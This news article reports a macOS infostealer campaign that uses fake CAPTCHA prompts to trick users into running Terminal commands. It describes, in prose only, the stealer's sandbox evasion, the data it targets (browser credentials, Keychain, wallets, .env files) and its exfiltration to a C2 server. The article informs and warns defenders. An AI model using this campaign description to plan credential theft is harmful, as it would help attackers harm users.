Cyber threats against macOS users have increased again with the emergence of a new information-stealing malware called Infinity Stealer. This malware uses increasingly sophisticated techniques, leveraging Python scripts compiled into executable files using the open-source compiler Nuitka.
This approach makes the malware more difficult to detect than traditional methods and marks a new evolution in attacks against Apple systems.
Bypassing Fake CAPTCHAs
The Infinity Stealer attack begins with the ClickFix technique, which displays a fake CAPTCHA that mimics Cloudflare’s human verification. Victims are redirected to a malicious site like update-check[.]com and asked to execute a specific command in the macOS Terminal.
Instead of simply verifying, users unknowingly execute a malicious, encrypted command. This command downloads a follow-up script that serves as the malware’s entry point into the system.
According to Malwarebytes researchers, this is the first campaign on macOS to combine the ClickFix technique with a Python-based infostealer compiled with Nuitka.
Harder to Detect Thanks to Nuitka
Unlike methods like PyInstaller, Nuitka compiles Python code into C and produces a native binary. This leaves the malware file without easily explainable bytecode traces.
As a result, detection by security systems is more difficult, and reverse engineering by researchers requires more effort.
“The final payload is written in Python and compiled with Nuitka, resulting in a native macOS binary that is more difficult to explain,” Malwarebytes stated.
How it Works and Target Data
After successfully infiltrating the system, the malware performs several steps before activating its main function. Infinity Stealer first performs a check to detect whether it is running in a sandbox or virtual environment, to avoid analysis.
If it passes, the malware begins collecting various sensitive data, including:
- Credentials from Chromium-based browsers and Firefox
- MacOS Keychain Data
- Cryptocurrency wallets
- Developer files such as .env containing secret text
Furthermore, the malware is capable of taking screenshots of the victim’s device. All collected data is then sent to a command-and-control (C2) server via HTTP POST, and the attacker receives a notification via Telegram.
A Real Threat to macOS Users
The emergence of Infinity Stealer demonstrates that macOS is no longer “immune” to sophisticated attacks. Social engineering techniques such as fake CAPTCHAs are a major vulnerability because they rely on user inattention, not just system vulnerabilities.
Users are advised not to imitate and execute commands in Terminal, especially those from unknown or incompletely understood websites.
Infinity Stealer is evidence that threats to macOS are increasingly complex and targeted. Using a combination of social engineering techniques and advanced compilation technology, this malware is able to bypass multiple layers of protection.
User vigilance remains the primary line of defense. Understanding the risks and being wary of suspicious instructions are simple yet crucial steps to maintaining data security in the digital age.
